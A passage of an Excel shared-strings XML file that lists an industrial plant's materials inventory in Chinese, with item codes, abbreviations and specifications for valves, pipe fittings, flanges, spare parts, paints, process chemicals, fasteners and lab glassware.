  <si>
    <t>304L弯头</t>
  </si>
  <si>
    <t>Φ159</t>
  </si>
  <si>
    <t>03030333</t>
  </si>
  <si>
    <t>GYST</t>
  </si>
  <si>
    <t>高压三通</t>
  </si>
  <si>
    <t>03030341</t>
  </si>
  <si>
    <t>WTΦ219</t>
  </si>
  <si>
    <t>Φ219</t>
  </si>
  <si>
    <t>03030343</t>
  </si>
  <si>
    <t>WTΦ159</t>
  </si>
  <si>
    <t>03030345</t>
  </si>
  <si>
    <t>WT</t>
  </si>
  <si>
    <t>25</t>
  </si>
  <si>
    <t>03030346</t>
  </si>
  <si>
    <t>WTΦ720</t>
  </si>
  <si>
    <t>Φ720</t>
  </si>
  <si>
    <t>03030353</t>
  </si>
  <si>
    <t>BJΦ45*76/4</t>
  </si>
  <si>
    <t>变径</t>
  </si>
  <si>
    <t>Φ57*32</t>
  </si>
  <si>
    <t>03030354-3</t>
  </si>
  <si>
    <t>BJ</t>
  </si>
  <si>
    <t>133/108</t>
  </si>
  <si>
    <t>03030362</t>
  </si>
  <si>
    <t>BJΦ530*10/426*10</t>
  </si>
  <si>
    <t>Φ530*10/426</t>
  </si>
  <si>
    <t>03030365</t>
  </si>
  <si>
    <t>BJΦ478*10/426*10</t>
  </si>
  <si>
    <t>Φ478*10/426*10</t>
  </si>
  <si>
    <t>03030370</t>
  </si>
  <si>
    <t>不锈钢弯头</t>
  </si>
  <si>
    <t>377</t>
  </si>
  <si>
    <t>03030371</t>
  </si>
  <si>
    <t>变径304</t>
  </si>
  <si>
    <t>108*89</t>
  </si>
  <si>
    <t>03030371-1</t>
  </si>
  <si>
    <t>不锈钢变径</t>
  </si>
  <si>
    <t>89*57</t>
  </si>
  <si>
    <t>03030371-3</t>
  </si>
  <si>
    <t>108*133</t>
  </si>
  <si>
    <t>03040405-1</t>
  </si>
  <si>
    <t>JZFJ41H-16 DN 32</t>
  </si>
  <si>
    <t>闸阀</t>
  </si>
  <si>
    <t>J41H-64 DN 32</t>
  </si>
  <si>
    <t>03040411</t>
  </si>
  <si>
    <t>HDN100</t>
  </si>
  <si>
    <t>止回阀</t>
  </si>
  <si>
    <t>03040419</t>
  </si>
  <si>
    <t>JZFZ41W-16 DN250</t>
  </si>
  <si>
    <t>闸伐</t>
  </si>
  <si>
    <t>Z41W-16 .10DN200</t>
  </si>
  <si>
    <t>03040419-1</t>
  </si>
  <si>
    <t>ZF</t>
  </si>
  <si>
    <t>Z41H-16 DN200</t>
  </si>
  <si>
    <t>03040421</t>
  </si>
  <si>
    <t>Z41H-16  DG250</t>
  </si>
  <si>
    <t>03040440-1</t>
  </si>
  <si>
    <t>03040501</t>
  </si>
  <si>
    <t>JZF</t>
  </si>
  <si>
    <t>截止阀</t>
  </si>
  <si>
    <t>DN 15</t>
  </si>
  <si>
    <t>03040504</t>
  </si>
  <si>
    <t>03040512</t>
  </si>
  <si>
    <t>J41H-40 .25DN  200</t>
  </si>
  <si>
    <t>03040512-1</t>
  </si>
  <si>
    <t>J41H-100 DN50</t>
  </si>
  <si>
    <t>03040514</t>
  </si>
  <si>
    <t>高压DN 15</t>
  </si>
  <si>
    <t>03040515</t>
  </si>
  <si>
    <t>JZFJ44Y-320 DN 25</t>
  </si>
  <si>
    <t>J44Y-320 DN 25</t>
  </si>
  <si>
    <t>03040516</t>
  </si>
  <si>
    <t>JZFJ44Y-320 DN 32</t>
  </si>
  <si>
    <t>J44Y-320 DN 32</t>
  </si>
  <si>
    <t>03040517</t>
  </si>
  <si>
    <t>JZFJ44Y-320 DN 40</t>
  </si>
  <si>
    <t>J44Y-320 DN 40</t>
  </si>
  <si>
    <t>03040519</t>
  </si>
  <si>
    <t>JZFJ44Y-320 DN 80</t>
  </si>
  <si>
    <t>J44Y-220-320 DN 80</t>
  </si>
  <si>
    <t>03040520-2</t>
  </si>
  <si>
    <t>JF</t>
  </si>
  <si>
    <t>220DN65</t>
  </si>
  <si>
    <t>03040522-2</t>
  </si>
  <si>
    <t>高压截止阀</t>
  </si>
  <si>
    <t>DN6-3</t>
  </si>
  <si>
    <t>03040527</t>
  </si>
  <si>
    <t>JLF</t>
  </si>
  <si>
    <t>节流阀</t>
  </si>
  <si>
    <t>L44Y-320.220 DN32</t>
  </si>
  <si>
    <t>03040527-1</t>
  </si>
  <si>
    <t>L44Y-320 DN25</t>
  </si>
  <si>
    <t>03040527-2</t>
  </si>
  <si>
    <t>220-320DN15</t>
  </si>
  <si>
    <t>03040530</t>
  </si>
  <si>
    <t>ZHFH72H-160 DN 125</t>
  </si>
  <si>
    <t>H72H-160 DN 125</t>
  </si>
  <si>
    <t>03040531</t>
  </si>
  <si>
    <t>ZHFH72H-160 DN 25</t>
  </si>
  <si>
    <t>H72H-160 DN 25</t>
  </si>
  <si>
    <t>03040537-2</t>
  </si>
  <si>
    <t>ZHF</t>
  </si>
  <si>
    <t>320DN15</t>
  </si>
  <si>
    <t>03040538</t>
  </si>
  <si>
    <t>QF</t>
  </si>
  <si>
    <t>球阀</t>
  </si>
  <si>
    <t>DN 50</t>
  </si>
  <si>
    <t>03040539</t>
  </si>
  <si>
    <t>Q11F-64 DN15</t>
  </si>
  <si>
    <t>03040540-1</t>
  </si>
  <si>
    <t>AQF</t>
  </si>
  <si>
    <t>安全阀</t>
  </si>
  <si>
    <t>10-16CDN65</t>
  </si>
  <si>
    <t>03040543-2</t>
  </si>
  <si>
    <t>AQFA41H-320 DN 32</t>
  </si>
  <si>
    <t>A41H-320 DN 32</t>
  </si>
  <si>
    <t>03040545</t>
  </si>
  <si>
    <t>AQFA41H-16 DN 25</t>
  </si>
  <si>
    <t>A41H-16 DN 25</t>
  </si>
  <si>
    <t>03040547-2</t>
  </si>
  <si>
    <t>DN 40</t>
  </si>
  <si>
    <t>03040547-3</t>
  </si>
  <si>
    <t>03040549</t>
  </si>
  <si>
    <t>40-DN50</t>
  </si>
  <si>
    <t>03040551-4</t>
  </si>
  <si>
    <t>220-DN50</t>
  </si>
  <si>
    <t>03040556</t>
  </si>
  <si>
    <t>KK</t>
  </si>
  <si>
    <t>考克</t>
  </si>
  <si>
    <t>DN20</t>
  </si>
  <si>
    <t>03040560</t>
  </si>
  <si>
    <t>JYFDN 15</t>
  </si>
  <si>
    <t>减压阀</t>
  </si>
  <si>
    <t>03040561</t>
  </si>
  <si>
    <t>SSQDN 20</t>
  </si>
  <si>
    <t>疏水器</t>
  </si>
  <si>
    <t>DN 20</t>
  </si>
  <si>
    <t>03040565</t>
  </si>
  <si>
    <t>SSFS45h-16K Dg25</t>
  </si>
  <si>
    <t>疏水阀</t>
  </si>
  <si>
    <t>S45h-16K Dg25</t>
  </si>
  <si>
    <t>03040566-2</t>
  </si>
  <si>
    <t>SSF</t>
  </si>
  <si>
    <t>03040567</t>
  </si>
  <si>
    <t>ZHFH42H-40 DN 200</t>
  </si>
  <si>
    <t>H42H-40 DN 200</t>
  </si>
  <si>
    <t>03040569</t>
  </si>
  <si>
    <t>QFQ41H-100 DN 32</t>
  </si>
  <si>
    <t>Q41H100-DN 32</t>
  </si>
  <si>
    <t>03040599</t>
  </si>
  <si>
    <t>ZSF</t>
  </si>
  <si>
    <t>柱塞阀</t>
  </si>
  <si>
    <t>03040601</t>
  </si>
  <si>
    <t>BWFBJ45W-16P DN 32</t>
  </si>
  <si>
    <t>保温阀</t>
  </si>
  <si>
    <t>BJ45W-16P DN 32</t>
  </si>
  <si>
    <t>03040603</t>
  </si>
  <si>
    <t>BXGJZF</t>
  </si>
  <si>
    <t>不锈钢截止阀</t>
  </si>
  <si>
    <t>J41W-16PDG20</t>
  </si>
  <si>
    <t>03040615</t>
  </si>
  <si>
    <t>BWFBJ45W-16R DN 65</t>
  </si>
  <si>
    <t>BJ45W-16R DN 65</t>
  </si>
  <si>
    <t>03040616-3</t>
  </si>
  <si>
    <t>03040616-4</t>
  </si>
  <si>
    <t>BXG JZF</t>
  </si>
  <si>
    <t>03040641-3</t>
  </si>
  <si>
    <t>DN150</t>
  </si>
  <si>
    <t>03040642</t>
  </si>
  <si>
    <t>JZFJ44W-220R DN 50</t>
  </si>
  <si>
    <t>J44W-220R DN 50</t>
  </si>
  <si>
    <t>03040657-2</t>
  </si>
  <si>
    <t>BXGAQF</t>
  </si>
  <si>
    <t>不锈钢安全阀</t>
  </si>
  <si>
    <t>DN32</t>
  </si>
  <si>
    <t>03040658-1</t>
  </si>
  <si>
    <t>03040660-1</t>
  </si>
  <si>
    <t>高压DN6</t>
  </si>
  <si>
    <t>03040660-2</t>
  </si>
  <si>
    <t>高压DN5</t>
  </si>
  <si>
    <t>03040681-3</t>
  </si>
  <si>
    <t>220.320-DN6</t>
  </si>
  <si>
    <t>03040682-3</t>
  </si>
  <si>
    <t>BXGQF</t>
  </si>
  <si>
    <t>不锈钢球阀</t>
  </si>
  <si>
    <t>03040687</t>
  </si>
  <si>
    <t>FQF</t>
  </si>
  <si>
    <t>浮球阀</t>
  </si>
  <si>
    <t>03040801</t>
  </si>
  <si>
    <t>DF</t>
  </si>
  <si>
    <t>DN 80</t>
  </si>
  <si>
    <t>03040802</t>
  </si>
  <si>
    <t>DFD43X-10 DN 150</t>
  </si>
  <si>
    <t>D43X-10 DN 150</t>
  </si>
  <si>
    <t>03040806-1</t>
  </si>
  <si>
    <t>TJFBJ（FX、FG）</t>
  </si>
  <si>
    <t>调节阀备件（阀芯、阀杆）</t>
  </si>
  <si>
    <t>03040806-4</t>
  </si>
  <si>
    <t>TJFBJ（FZ、FG）</t>
  </si>
  <si>
    <t>调节阀备件（阀座、阀杆）</t>
  </si>
  <si>
    <t>03040811</t>
  </si>
  <si>
    <t>DFD41W-10 DN 200</t>
  </si>
  <si>
    <t>D41W-10 DN 200</t>
  </si>
  <si>
    <t>03040814-1</t>
  </si>
  <si>
    <t>BWG</t>
  </si>
  <si>
    <t>涡轮箱</t>
  </si>
  <si>
    <t>500</t>
  </si>
  <si>
    <t>03040823</t>
  </si>
  <si>
    <t>LJT</t>
  </si>
  <si>
    <t>软接头</t>
  </si>
  <si>
    <t>03051102</t>
  </si>
  <si>
    <t>FDN32</t>
  </si>
  <si>
    <t>法兰</t>
  </si>
  <si>
    <t>03051104</t>
  </si>
  <si>
    <t>FL</t>
  </si>
  <si>
    <t>0.6-16-DN150</t>
  </si>
  <si>
    <t>03051107</t>
  </si>
  <si>
    <t>FL16-DN600</t>
  </si>
  <si>
    <t>03051111</t>
  </si>
  <si>
    <t>304FLDG40</t>
  </si>
  <si>
    <t>304法兰</t>
  </si>
  <si>
    <t>DG40</t>
  </si>
  <si>
    <t>03051114</t>
  </si>
  <si>
    <t>FL304</t>
  </si>
  <si>
    <t>法兰304</t>
  </si>
  <si>
    <t>16-DN20</t>
  </si>
  <si>
    <t>03051118</t>
  </si>
  <si>
    <t>FDN</t>
  </si>
  <si>
    <t>03051123</t>
  </si>
  <si>
    <t>03051143-1</t>
  </si>
  <si>
    <t>03051150-1</t>
  </si>
  <si>
    <t>64DN20</t>
  </si>
  <si>
    <t>03051151</t>
  </si>
  <si>
    <t>FL 220-DN80</t>
  </si>
  <si>
    <t>220-DN80</t>
  </si>
  <si>
    <t>03051154-1</t>
  </si>
  <si>
    <t>法兰盖</t>
  </si>
  <si>
    <t>03051154-4</t>
  </si>
  <si>
    <t>盲板</t>
  </si>
  <si>
    <t>03051157</t>
  </si>
  <si>
    <t>FL DN100</t>
  </si>
  <si>
    <t>03051163</t>
  </si>
  <si>
    <t>GYWT</t>
  </si>
  <si>
    <t>高压弯头</t>
  </si>
  <si>
    <t>DN125</t>
  </si>
  <si>
    <t>03051164</t>
  </si>
  <si>
    <t>03051164-2</t>
  </si>
  <si>
    <t>GYWY</t>
  </si>
  <si>
    <t>03051164-3</t>
  </si>
  <si>
    <t>Φ180</t>
  </si>
  <si>
    <t>03051164-5</t>
  </si>
  <si>
    <t>φ127</t>
  </si>
  <si>
    <t>03051165-1</t>
  </si>
  <si>
    <t>102</t>
  </si>
  <si>
    <t>03051169</t>
  </si>
  <si>
    <t>TMDJDHFL25-DN50</t>
  </si>
  <si>
    <t>凸面带颈对焊法兰</t>
  </si>
  <si>
    <t>25-DN50</t>
  </si>
  <si>
    <t>03051172</t>
  </si>
  <si>
    <t>03051183-1</t>
  </si>
  <si>
    <t>GYFL</t>
  </si>
  <si>
    <t>高压法兰</t>
  </si>
  <si>
    <t>03051183-2</t>
  </si>
  <si>
    <t>03051183-5</t>
  </si>
  <si>
    <t>64-DN32</t>
  </si>
  <si>
    <t>03051184-1</t>
  </si>
  <si>
    <t>高压盲板</t>
  </si>
  <si>
    <t>03051185-1</t>
  </si>
  <si>
    <t>320-25</t>
  </si>
  <si>
    <t>03051185-2</t>
  </si>
  <si>
    <t>320-15</t>
  </si>
  <si>
    <t>03051185-3</t>
  </si>
  <si>
    <t>03051185-4</t>
  </si>
  <si>
    <t>03051185-5</t>
  </si>
  <si>
    <t>03051185-7</t>
  </si>
  <si>
    <t>03051187</t>
  </si>
  <si>
    <t>N15</t>
  </si>
  <si>
    <t>03051187-2</t>
  </si>
  <si>
    <t>DN6</t>
  </si>
  <si>
    <t>03051189</t>
  </si>
  <si>
    <t>03051190</t>
  </si>
  <si>
    <t>GYYJG</t>
  </si>
  <si>
    <t>高压异径管</t>
  </si>
  <si>
    <t>03051191</t>
  </si>
  <si>
    <t>高压丝头</t>
  </si>
  <si>
    <t>35</t>
  </si>
  <si>
    <t>03051193-4</t>
  </si>
  <si>
    <t>GYBJ</t>
  </si>
  <si>
    <t>高压变径</t>
  </si>
  <si>
    <t>25*40</t>
  </si>
  <si>
    <t>03051193-5</t>
  </si>
  <si>
    <t>108/76</t>
  </si>
  <si>
    <t>03051194-5</t>
  </si>
  <si>
    <t>25/80</t>
  </si>
  <si>
    <t>03051195</t>
  </si>
  <si>
    <t>127*180</t>
  </si>
  <si>
    <t>03060701</t>
  </si>
  <si>
    <t>FX</t>
  </si>
  <si>
    <t>阀板</t>
  </si>
  <si>
    <t>03060706</t>
  </si>
  <si>
    <t>ZFFGDN 600</t>
  </si>
  <si>
    <t>座阀阀杆</t>
  </si>
  <si>
    <t>DN 600</t>
  </si>
  <si>
    <t>03060708</t>
  </si>
  <si>
    <t>ZFFGDN 700</t>
  </si>
  <si>
    <t>DN 700</t>
  </si>
  <si>
    <t>03060711-1</t>
  </si>
  <si>
    <t>闸阀阀杆</t>
  </si>
  <si>
    <t>03060711-3</t>
  </si>
  <si>
    <t>ZFFGDN</t>
  </si>
  <si>
    <t>DN 250</t>
  </si>
  <si>
    <t>03060711-4</t>
  </si>
  <si>
    <t>ZFFGDN 500</t>
  </si>
  <si>
    <t>DN 500</t>
  </si>
  <si>
    <t>03060717</t>
  </si>
  <si>
    <t>SZTDN 600</t>
  </si>
  <si>
    <t>DN 600-500</t>
  </si>
  <si>
    <t>03060719-1</t>
  </si>
  <si>
    <t>阀体</t>
  </si>
  <si>
    <t>03060719-2</t>
  </si>
  <si>
    <t>03060720</t>
  </si>
  <si>
    <t>阀芯闸阀</t>
  </si>
  <si>
    <t>03060720-1</t>
  </si>
  <si>
    <t>FX（ZF）DN 200</t>
  </si>
  <si>
    <t>阀芯（闸阀）</t>
  </si>
  <si>
    <t>03060722-2</t>
  </si>
  <si>
    <t>SJX</t>
  </si>
  <si>
    <t>升降楔</t>
  </si>
  <si>
    <t>03060723</t>
  </si>
  <si>
    <t>BCDN 250</t>
  </si>
  <si>
    <t>拨叉</t>
  </si>
  <si>
    <t>03060723-1</t>
  </si>
  <si>
    <t>BC</t>
  </si>
  <si>
    <t>03060723-2</t>
  </si>
  <si>
    <t>03060724-1</t>
  </si>
  <si>
    <t>THDN 600</t>
  </si>
  <si>
    <t>DN 600-700</t>
  </si>
  <si>
    <t>03060724-2</t>
  </si>
  <si>
    <t>TH</t>
  </si>
  <si>
    <t>小弹簧</t>
  </si>
  <si>
    <t>03060725-1</t>
  </si>
  <si>
    <t>THZ</t>
  </si>
  <si>
    <t>弹簧压</t>
  </si>
  <si>
    <t>03060727-1</t>
  </si>
  <si>
    <t>ZJ</t>
  </si>
  <si>
    <t>支架</t>
  </si>
  <si>
    <t>03060727-2</t>
  </si>
  <si>
    <t>03060727-3</t>
  </si>
  <si>
    <t>ZJDN 200</t>
  </si>
  <si>
    <t>DN 200</t>
  </si>
  <si>
    <t>03060729-1</t>
  </si>
  <si>
    <t>FKDN 600</t>
  </si>
  <si>
    <t>阀座</t>
  </si>
  <si>
    <t>03060729-2</t>
  </si>
  <si>
    <t>FKDN 700</t>
  </si>
  <si>
    <t>03060729-4</t>
  </si>
  <si>
    <t>FKDN 500</t>
  </si>
  <si>
    <t>阀口</t>
  </si>
  <si>
    <t>03060730-1</t>
  </si>
  <si>
    <t>FG</t>
  </si>
  <si>
    <t>阀盖</t>
  </si>
  <si>
    <t>03060733</t>
  </si>
  <si>
    <t>YYDFDN 500</t>
  </si>
  <si>
    <t>油压碟阀</t>
  </si>
  <si>
    <t>03060733-1</t>
  </si>
  <si>
    <t>SJSZBF</t>
  </si>
  <si>
    <t>油压板阀</t>
  </si>
  <si>
    <t>03060733-4</t>
  </si>
  <si>
    <t>SQF</t>
  </si>
  <si>
    <t>散气阀</t>
  </si>
  <si>
    <t>03060734</t>
  </si>
  <si>
    <t>LJFL</t>
  </si>
  <si>
    <t>连接盘</t>
  </si>
  <si>
    <t>03060734-1</t>
  </si>
  <si>
    <t>LJP</t>
  </si>
  <si>
    <t>03060737-4</t>
  </si>
  <si>
    <t>TLYGDN 600</t>
  </si>
  <si>
    <t>填料压盖</t>
  </si>
  <si>
    <t>03060743-1</t>
  </si>
  <si>
    <t>YFTDN 250</t>
  </si>
  <si>
    <t>03060743-2</t>
  </si>
  <si>
    <t>YFTDN 700</t>
  </si>
  <si>
    <t>03060747</t>
  </si>
  <si>
    <t>250-700</t>
  </si>
  <si>
    <t>03060748-1</t>
  </si>
  <si>
    <t>ZDJDN600</t>
  </si>
  <si>
    <t>座短节</t>
  </si>
  <si>
    <t>03060748-2</t>
  </si>
  <si>
    <t>ZDJDN700</t>
  </si>
  <si>
    <t>03060750</t>
  </si>
  <si>
    <t>JG</t>
  </si>
  <si>
    <t>节杆</t>
  </si>
  <si>
    <t>DN700-600</t>
  </si>
  <si>
    <t>03060750-2</t>
  </si>
  <si>
    <t>LGZC</t>
  </si>
  <si>
    <t>连杆总成</t>
  </si>
  <si>
    <t>03070903-1</t>
  </si>
  <si>
    <t>SJ</t>
  </si>
  <si>
    <t>视镜片</t>
  </si>
  <si>
    <t>Φ 160</t>
  </si>
  <si>
    <t>03070903-3</t>
  </si>
  <si>
    <t>视镜</t>
  </si>
  <si>
    <t>Φ160</t>
  </si>
  <si>
    <t>03070905</t>
  </si>
  <si>
    <t>BLK</t>
  </si>
  <si>
    <t>玻璃块</t>
  </si>
  <si>
    <t>03070910-2</t>
  </si>
  <si>
    <t>GZ</t>
  </si>
  <si>
    <t>丝头</t>
  </si>
  <si>
    <t>03070917</t>
  </si>
  <si>
    <t>WTDN 20</t>
  </si>
  <si>
    <t>03070918</t>
  </si>
  <si>
    <t>BJST</t>
  </si>
  <si>
    <t>25/15</t>
  </si>
  <si>
    <t>03070919</t>
  </si>
  <si>
    <t>对丝</t>
  </si>
  <si>
    <t>03070920-1</t>
  </si>
  <si>
    <t>03070921</t>
  </si>
  <si>
    <t>HJTDN 20</t>
  </si>
  <si>
    <t>活接头</t>
  </si>
  <si>
    <t>03070926</t>
  </si>
  <si>
    <t>LG</t>
  </si>
  <si>
    <t>管箍</t>
  </si>
  <si>
    <t>03070929</t>
  </si>
  <si>
    <t>PT</t>
  </si>
  <si>
    <t>不锈钢喷头</t>
  </si>
  <si>
    <t>03070935</t>
  </si>
  <si>
    <t>YBKZJT</t>
  </si>
  <si>
    <t>管卡</t>
  </si>
  <si>
    <t>03070936-2</t>
  </si>
  <si>
    <t>03071003</t>
  </si>
  <si>
    <t>MP</t>
  </si>
  <si>
    <t>03071006</t>
  </si>
  <si>
    <t>320-DN50</t>
  </si>
  <si>
    <t>03071006-1</t>
  </si>
  <si>
    <t>TL</t>
  </si>
  <si>
    <t>填料</t>
  </si>
  <si>
    <t>03071007-2</t>
  </si>
  <si>
    <t>MPDN 65</t>
  </si>
  <si>
    <t>DN 65</t>
  </si>
  <si>
    <t>03071008</t>
  </si>
  <si>
    <t>MPDN 80</t>
  </si>
  <si>
    <t>03071009</t>
  </si>
  <si>
    <t>MPDN 125</t>
  </si>
  <si>
    <t>DN 125</t>
  </si>
  <si>
    <t>03071025-1</t>
  </si>
  <si>
    <t>100内</t>
  </si>
  <si>
    <t>03071025-2</t>
  </si>
  <si>
    <t>100-200</t>
  </si>
  <si>
    <t>03071028-2</t>
  </si>
  <si>
    <t>SSDDN 650</t>
  </si>
  <si>
    <t>输送带</t>
  </si>
  <si>
    <t>DN 650</t>
  </si>
  <si>
    <t>03071030</t>
  </si>
  <si>
    <t>XFS</t>
  </si>
  <si>
    <t>消防栓</t>
  </si>
  <si>
    <t>65</t>
  </si>
  <si>
    <t>03071030-1</t>
  </si>
  <si>
    <t>04020201</t>
  </si>
  <si>
    <t>THQ</t>
  </si>
  <si>
    <t>调和漆</t>
  </si>
  <si>
    <t>绿</t>
  </si>
  <si>
    <t>04020201-15</t>
  </si>
  <si>
    <t>fxq</t>
  </si>
  <si>
    <t>防锈漆</t>
  </si>
  <si>
    <t>铁红</t>
  </si>
  <si>
    <t>04020201-2</t>
  </si>
  <si>
    <t>黄</t>
  </si>
  <si>
    <t>04020208</t>
  </si>
  <si>
    <t>XL</t>
  </si>
  <si>
    <t>稀料</t>
  </si>
  <si>
    <t>04020209-4</t>
  </si>
  <si>
    <t>lqq</t>
  </si>
  <si>
    <t>沥青漆</t>
  </si>
  <si>
    <t>珠峰</t>
  </si>
  <si>
    <t>04020211-1</t>
  </si>
  <si>
    <t>mjyqxj</t>
  </si>
  <si>
    <t>煤焦油清洗剂</t>
  </si>
  <si>
    <t>04030215</t>
  </si>
  <si>
    <t>cJ</t>
  </si>
  <si>
    <t>纯碱</t>
  </si>
  <si>
    <t>04030301</t>
  </si>
  <si>
    <t>CS</t>
  </si>
  <si>
    <t>醋酸</t>
  </si>
  <si>
    <t>04030303</t>
  </si>
  <si>
    <t>ZGJ</t>
  </si>
  <si>
    <t>阻垢剂</t>
  </si>
  <si>
    <t>04030306</t>
  </si>
  <si>
    <t>TLJ201</t>
  </si>
  <si>
    <t>脱琉剂201</t>
  </si>
  <si>
    <t>04030310</t>
  </si>
  <si>
    <t>KJ</t>
  </si>
  <si>
    <t>烤胶</t>
  </si>
  <si>
    <t>04030311</t>
  </si>
  <si>
    <t>WYHEF</t>
  </si>
  <si>
    <t>五氧化二钒</t>
  </si>
  <si>
    <t>50/桶</t>
  </si>
  <si>
    <t>04030312</t>
  </si>
  <si>
    <t>SJJ</t>
  </si>
  <si>
    <t>杀菌剂【固体】</t>
  </si>
  <si>
    <t>HD-408</t>
  </si>
  <si>
    <t>04030313</t>
  </si>
  <si>
    <t>HM</t>
  </si>
  <si>
    <t>褐煤</t>
  </si>
  <si>
    <t>吨</t>
  </si>
  <si>
    <t>04030315</t>
  </si>
  <si>
    <t>TLJ202</t>
  </si>
  <si>
    <t>脱硫剂202</t>
  </si>
  <si>
    <t>04030316-2</t>
  </si>
  <si>
    <t>tyjsj</t>
  </si>
  <si>
    <t>脱油净水剂</t>
  </si>
  <si>
    <t>TY-206</t>
  </si>
  <si>
    <t>04030317</t>
  </si>
  <si>
    <t>LS</t>
  </si>
  <si>
    <t>硫酸</t>
  </si>
  <si>
    <t>04030318</t>
  </si>
  <si>
    <t>YS</t>
  </si>
  <si>
    <t>盐酸</t>
  </si>
  <si>
    <t>04030320</t>
  </si>
  <si>
    <t>YJ</t>
  </si>
  <si>
    <t>液碱</t>
  </si>
  <si>
    <t>04030321</t>
  </si>
  <si>
    <t>xa</t>
  </si>
  <si>
    <t>酰胺</t>
  </si>
  <si>
    <t>04030332</t>
  </si>
  <si>
    <t>tjj</t>
  </si>
  <si>
    <t>添加剂</t>
  </si>
  <si>
    <t>T706</t>
  </si>
  <si>
    <t>04030334</t>
  </si>
  <si>
    <t>T551</t>
  </si>
  <si>
    <t>04030401</t>
  </si>
  <si>
    <t>ACM</t>
  </si>
  <si>
    <t>氨触媒</t>
  </si>
  <si>
    <t>XA201</t>
  </si>
  <si>
    <t>04040140</t>
  </si>
  <si>
    <t>yt</t>
  </si>
  <si>
    <t>塑料桶</t>
  </si>
  <si>
    <t>04040329</t>
  </si>
  <si>
    <t>502</t>
  </si>
  <si>
    <t>04040403</t>
  </si>
  <si>
    <t>LX</t>
  </si>
  <si>
    <t>滤芯</t>
  </si>
  <si>
    <t>04040406-4</t>
  </si>
  <si>
    <t>gSS15#</t>
  </si>
  <si>
    <t>钢丝绳</t>
  </si>
  <si>
    <t>15#</t>
  </si>
  <si>
    <t>04040407</t>
  </si>
  <si>
    <t>QKZ</t>
  </si>
  <si>
    <t>青稞纸</t>
  </si>
  <si>
    <t>张</t>
  </si>
  <si>
    <t>04040413-1</t>
  </si>
  <si>
    <t>蛇皮管1</t>
  </si>
  <si>
    <t>04040414</t>
  </si>
  <si>
    <t>gsg</t>
  </si>
  <si>
    <t>钢丝管</t>
  </si>
  <si>
    <t>04040449--2</t>
  </si>
  <si>
    <t>SX30#</t>
  </si>
  <si>
    <t>水箱</t>
  </si>
  <si>
    <t>30#</t>
  </si>
  <si>
    <t>04040498--1</t>
  </si>
  <si>
    <t>轮胎</t>
  </si>
  <si>
    <t>17.5-25</t>
  </si>
  <si>
    <t>04040504</t>
  </si>
  <si>
    <t>lcWT</t>
  </si>
  <si>
    <t>拉车外胎</t>
  </si>
  <si>
    <t>04040505</t>
  </si>
  <si>
    <t>lcl</t>
  </si>
  <si>
    <t>胶轮</t>
  </si>
  <si>
    <t>04040518-1</t>
  </si>
  <si>
    <t>mgp</t>
  </si>
  <si>
    <t>磨光片</t>
  </si>
  <si>
    <t>04040531-4</t>
  </si>
  <si>
    <t>gsw</t>
  </si>
  <si>
    <t>钢丝网</t>
  </si>
  <si>
    <t>04040616</t>
  </si>
  <si>
    <t>DZ</t>
  </si>
  <si>
    <t>钢钉</t>
  </si>
  <si>
    <t>04050701</t>
  </si>
  <si>
    <t>LMM6</t>
  </si>
  <si>
    <t>04050703</t>
  </si>
  <si>
    <t>LMM10</t>
  </si>
  <si>
    <t>04050704</t>
  </si>
  <si>
    <t>LMM12</t>
  </si>
  <si>
    <t>04050705</t>
  </si>
  <si>
    <t>LMM14</t>
  </si>
  <si>
    <t>M14</t>
  </si>
  <si>
    <t>04050706</t>
  </si>
  <si>
    <t>LMM16</t>
  </si>
  <si>
    <t>04050707</t>
  </si>
  <si>
    <t>LMM18</t>
  </si>
  <si>
    <t>M18</t>
  </si>
  <si>
    <t>04050709</t>
  </si>
  <si>
    <t>LMM22</t>
  </si>
  <si>
    <t>04050710</t>
  </si>
  <si>
    <t>LMM24</t>
  </si>
  <si>
    <t>04050711</t>
  </si>
  <si>
    <t>LMM20</t>
  </si>
  <si>
    <t>04050717</t>
  </si>
  <si>
    <t>LSM12*70</t>
  </si>
  <si>
    <t>螺丝</t>
  </si>
  <si>
    <t>M12*50</t>
  </si>
  <si>
    <t>04050719</t>
  </si>
  <si>
    <t>16*70</t>
  </si>
  <si>
    <t>M16*60</t>
  </si>
  <si>
    <t>04050719-1</t>
  </si>
  <si>
    <t>ls</t>
  </si>
  <si>
    <t>16*80</t>
  </si>
  <si>
    <t>04050721</t>
  </si>
  <si>
    <t>LSM20*90</t>
  </si>
  <si>
    <t>M20*110</t>
  </si>
  <si>
    <t>04050741-1</t>
  </si>
  <si>
    <t>双头螺栓</t>
  </si>
  <si>
    <t>双头螺栓8.8级</t>
  </si>
  <si>
    <t>m24*105</t>
  </si>
  <si>
    <t>04050741-3</t>
  </si>
  <si>
    <t>m24*195</t>
  </si>
  <si>
    <t>04050742-2</t>
  </si>
  <si>
    <t>stls</t>
  </si>
  <si>
    <t>24*130</t>
  </si>
  <si>
    <t>04050746</t>
  </si>
  <si>
    <t>DJLSM30*1000</t>
  </si>
  <si>
    <t>地脚螺丝</t>
  </si>
  <si>
    <t>M36*1000</t>
  </si>
  <si>
    <t>04050752</t>
  </si>
  <si>
    <t>SGM8*1000</t>
  </si>
  <si>
    <t>丝杠</t>
  </si>
  <si>
    <t>M8*1000</t>
  </si>
  <si>
    <t>04050753</t>
  </si>
  <si>
    <t>SGM10*1000</t>
  </si>
  <si>
    <t>M10*1000</t>
  </si>
  <si>
    <t>04050759</t>
  </si>
  <si>
    <t>SGM22*1000</t>
  </si>
  <si>
    <t>M22*1000</t>
  </si>
  <si>
    <t>04050775</t>
  </si>
  <si>
    <t>PGDM10</t>
  </si>
  <si>
    <t>平光垫</t>
  </si>
  <si>
    <t>04050776</t>
  </si>
  <si>
    <t>PGDM14</t>
  </si>
  <si>
    <t>04050777</t>
  </si>
  <si>
    <t>PGDM16</t>
  </si>
  <si>
    <t>04050779</t>
  </si>
  <si>
    <t>PGDM22</t>
  </si>
  <si>
    <t>平弹垫</t>
  </si>
  <si>
    <t>04060805-1</t>
  </si>
  <si>
    <t>xeq</t>
  </si>
  <si>
    <t>吸耳球</t>
  </si>
  <si>
    <t>04060806</t>
  </si>
  <si>
    <t>671XSP</t>
  </si>
  <si>
    <t>671吸收瓶</t>
  </si>
  <si>
    <t>04060809</t>
  </si>
  <si>
    <t>04060812</t>
  </si>
  <si>
    <t>WLDDG</t>
  </si>
  <si>
    <t>棕酸/棕碱滴定管</t>
  </si>
  <si>
    <t>04060813</t>
  </si>
  <si>
    <t>BLG</t>
  </si>
  <si>
    <t>玻璃管</t>
  </si>
  <si>
    <t>04060818</t>
  </si>
  <si>
